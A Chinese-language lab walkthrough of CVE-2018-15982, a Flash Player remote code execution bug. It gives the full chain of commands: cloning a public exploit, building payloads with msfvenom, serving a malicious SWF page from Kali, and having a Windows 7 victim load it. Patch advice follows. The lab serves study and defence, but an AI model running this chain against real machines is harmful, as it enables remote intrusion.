Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个关键的Adobe Flash Player的漏洞和一个重要的Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。
一、环境准备
攻击机:kali IP:192.168.60.129
靶 机:windows 7 IP:192.168.60.130
漏洞编号“CVE-2018-15982”
二、实施如下
Kali 配置相关攻击命令:
下载POC
git clone https://github.com/Ridter/CVE-2018-15982_EXP
生成payload文件并放在poc同目录下
msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin
msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin
执行poc生成视频和网页文件
python CVE_2018_15982.py -i 86.bin -I 64.bin
开启apache服务并将生成的文件复制到web目录下
service apache2 start
cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf
win7操作:
访问http://192.168.60.129/index.html,弹出计算机即远程代码执行成功
三、影响版本:
Adobe Flash Player <= 31.0.0.153
Adobe Flash Player Installer<= 31.0.0.108
四、修补建议:
1、Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新,修复了CVE-2018-15982漏洞。
2、不要打开陌生人提供的网页链接和office文档,都可能内嵌恶意flash文件从而执行远程代码。
3、保持系统和杀毒软件处于最新版本。
五、补丁下载
下载地址:
https://www.flash.cn/
注:本工具不得用于商业用途,仅做学习交流,一切后果自行承担。